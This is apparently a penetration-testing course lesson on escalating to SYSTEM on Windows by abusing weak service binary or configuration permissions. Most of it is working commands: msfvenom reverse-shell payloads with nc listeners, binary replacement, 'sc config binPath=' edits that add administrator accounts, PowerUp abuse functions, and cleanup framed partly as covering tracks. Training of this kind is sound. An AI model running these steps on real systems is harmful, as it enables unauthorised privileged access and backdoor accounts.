Weak Service Permissions

intermediate30 minWriteup

Exploiting services with weak permissions

Learning Objectives

  • Find modifiable services
  • Change service binary path
  • Modify service configuration
  • Exploit service permissions

Weak service permissions occur when a service's configuration or binary can be modified by non-administrative users. This allows us to either replace the service binary with a malicious one, or change the service's configuration to point to our payload.

Think of it like having write access to a security guard's instruction manual. You can tell the guard (running as SYSTEM) to do whatever you want - including giving you the master keys.

Two Attack Vectors

Weak permissions can apply to: (1) the service binary file itself, or (2) the service configuration in the registry. Both lead to SYSTEM access, but exploitation differs.

Finding Weak Permissions

Weak Binary Permissions

batch
1REM Check service binary permissions
2icacls 606070;">#a5d6ff;">"C:Program FilesVulnAppservice.exe"
3 
4REM Look for:
5REM BUILTINUsers:(M)     - Modify
6REM BUILTINUsers:(F)     - Full control
7REM Everyone:(M)
8REM Authenticated Users:(W)
9 
10REM Using accesschk (Sysinternals)
11accesschk.exe /accepteula -wvu 606070;">#a5d6ff;">"C:Program FilesVulnAppservice.exe"
12 
13REM Find all writable service binaries
14REM First get list of service paths
15wmic service get name,pathname > services.txt
16 
17REM Then check each binary (or use PowerUp)
18Import-Module PowerUp.ps1
19Get-ModifiableServiceFile
20 
21REM Example output:
22REM ServiceName    : VulnService
23REM Path           : C:Program FilesVulnAppservice.exe
24REM ModifiableFile : C:Program FilesVulnAppservice.exe
25REM StartName      : LocalSystem

Weak Service Configuration

batch
1REM Check if we can modify service configuration
2accesschk.exe /accepteula -uwcqv 606070;">#a5d6ff;">"Authenticated Users" *
3accesschk.exe -uwcqv 606070;">#a5d6ff;">"Users" *
4accesschk.exe -uwcqv 606070;">#a5d6ff;">"Everyone" *
5 
6REM Look for services with:
7REM SERVICE_ALL_ACCESS
8REM SERVICE_CHANGE_CONFIG
9 
10REM Example output:
11REM VulnService
12REM   RW BUILTINUsers
13REM   SERVICE_ALL_ACCESS
14 
15REM PowerUp method
16Get-ModifiableService
17 
18REM Output shows services we can modify:
19REM ServiceName : VulnService
20REM CanRestart  : True
21REM StartName   : LocalSystem
22REM AbuseFunction : Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'VulnService'

accesschk is Essential

Always upload accesschk.exe for permission checking. It's part of Sysinternals and isn't flagged as malicious by most AV.

Binary Replacement Attack

batch
1REM Scenario: We can write to the service binary
2 
3REM 1. Verify permissions
4icacls 606070;">#a5d6ff;">"C:VulnAppservice.exe"
5REM BUILTINUsers:(M) ← We can modify!
6 
7REM 2. Check service account
8sc qc VulnService
9REM SERVICE_START_NAME: LocalSystem ← Runs as SYSTEM!
10 
11REM 3. Backup original (optional, for cleanup)
12copy 606070;">#a5d6ff;">"C:VulnAppservice.exe" "C:VulnAppservice.exe.bak"
13 
14REM 4. Create payload
15REM On attack machine:
16msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o evil.exe
17 
18REM 5. Replace the binary
19copy evil.exe 606070;">#a5d6ff;">"C:VulnAppservice.exe" /Y
20 
21REM 6. Start listener
22nc -lvnp 4444
23 
24REM 7. Restart service
25sc stop VulnService
26sc start VulnService
27 
28REM 8. Catch SYSTEM shell!

Using PowerUp for Binary Replacement

powershell
1606070;"># PowerUp automates binary replacement
2Import-Module PowerUp.ps1
3 
4606070;"># Check for vulnerable binaries
5Get-ModifiableServiceFile
6 
7606070;"># Automatic exploitation (adds admin user)
8Install-ServiceBinary -Name 606070;">#a5d6ff;">'VulnService'
9606070;"># Creates backup, replaces with user-adding binary
10606070;"># Adds: john / Password123!
11 
12606070;"># Verify service restart permission
13Get-ModifiableService
14 
15606070;"># Restart service
16Restart-Service VulnService
17 
18606070;"># Check for new admin
19net localgroup Administrators
20606070;"># Should show 'john'
21 
22606070;"># Custom command instead of adding user
23Install-ServiceBinary -Name 606070;">#a5d6ff;">'VulnService' -Command 'C:	empshell.exe'
24Restart-Service VulnService

Configuration Modification Attack

batch
1REM Scenario: We can modify service configuration (not binary)
2 
3REM 1. Verify we have SERVICE_CHANGE_CONFIG
4accesschk.exe -ucqv VulnService
5REM BUILTINUsers   SERVICE_ALL_ACCESS ← Yes!
6 
7REM 2. Check current configuration
8sc qc VulnService
9REM BINARY_PATH_NAME: C:VulnApporiginal.exe
10 
11REM 3. Create our payload
12msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o C:	empshell.exe
13 
14REM 4. Modify service binary path
15sc config VulnService binPath= 606070;">#a5d6ff;">"C:	empshell.exe"
16REM Note: space after binPath= is required!
17 
18REM 5. Verify change
19sc qc VulnService
20REM BINARY_PATH_NAME: C:	empshell.exe
21 
22REM 6. Start listener
23nc -lvnp 4444
24 
25REM 7. Restart service
26sc stop VulnService
27sc start VulnService
28 
29REM 8. Catch SYSTEM shell!
30 
31REM Alternative: Run a command directly
32sc config VulnService binPath= 606070;">#a5d6ff;">"cmd /c net localgroup Administrators hacker /add"
33sc start VulnService
34REM Service will 606070;">#a5d6ff;">"fail" but command runs as SYSTEM

Using PowerUp for Config Abuse

powershell
1606070;"># PowerUp's service abuse function
2Import-Module PowerUp.ps1
3 
4606070;"># Automatic exploitation
5Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'VulnService'
6606070;"># Changes binPath to add current user to Administrators
7606070;"># Restarts service to trigger
8 
9606070;"># Custom command
10Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'VulnService' -Command "net user attacker Password123! /add"
11606070;"># Runs your command as SYSTEM
12 
13606070;"># Full reverse shell
14Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'VulnService' -Command "C:	empshell.exe"
15Restart-Service VulnService

Service May Fail to Start

After changing binPath to a command or non-service binary, the service will fail to start properly. But the command/binary still executes as SYSTEM once! Plan for this.

Triggering the Service

batch
1REM Check if we can restart the service
2accesschk.exe -ucqv VulnService
3REM Look for: SERVICE_START and SERVICE_STOP
4 
5REM Method 1: Direct restart (if we have permission)
6sc stop VulnService
7sc start VulnService
8 
9REM Or using net
10net stop VulnService
11net start VulnService
12 
13REM Method 2: Wait for system reboot
14REM If service is AUTO_START, runs on boot
15sc qc VulnService | findstr START_TYPE
16REM AUTO_START = runs on reboot
17 
18REM Method 3: Use another service to restart it
19REM Some services have dependencies
20 
21REM Method 4: System restart (if we have privilege)
22shutdown /r /t 0
23 
24REM Method 5: Crash the service
25REM If service has restart-on-failure policy
26sc qfailure VulnService
27REM Shows what happens on failure

Cleanup and Restoration

batch
1REM After exploitation, restore original configuration
2 
3REM For binary replacement:
4copy 606070;">#a5d6ff;">"C:VulnAppservice.exe.bak" "C:VulnAppservice.exe" /Y
5sc start VulnService
6 
7REM For config modification:
8sc config VulnService binPath= 606070;">#a5d6ff;">"C:VulnApporiginal.exe"
9sc start VulnService
10 
11REM PowerUp has restoration function
12Restore-ServiceBinary -Name 606070;">#a5d6ff;">'VulnService'
13 
14REM Cleanup is important for:
15REM - Stealth (covering tracks)
16REM - System stability
17REM - Not breaking production services
18REM - CTF score (some penalize breaking things)

Exploitation Methodology

Weak Service Permissions Exploitation

1
Enumerateaccesschk for service and file permissions
2
IdentifyFind services we can modify or binaries we can replace
3
Verify SYSTEMCheck SERVICE_START_NAME is LocalSystem
4
BackupSave original binary/config for cleanup
5
PayloadCreate malicious binary or command
6
ModifyReplace binary or change binPath
7
TriggerRestart service or wait for reboot
8
AccessCatch shell or verify admin access

Knowledge Check

Quick Quiz
Question 1 of 3

What's the difference between modifying a service binary vs service configuration?

Challenges

Service Permission Abuse

Challenge
🔥 intermediate

Find a service with weak permissions (either on the binary or configuration) and exploit it to gain SYSTEM access.

Need a hint? (4 available)

Key Takeaways

  • Weak binary permissions = replace the service executable
  • Weak service permissions = change the binPath configuration
  • SERVICE_CHANGE_CONFIG or file Modify (M) enables exploitation
  • Service must run as LocalSystem for SYSTEM access
  • PowerUp automates both enumeration and exploitation
  • Always backup originals for cleanup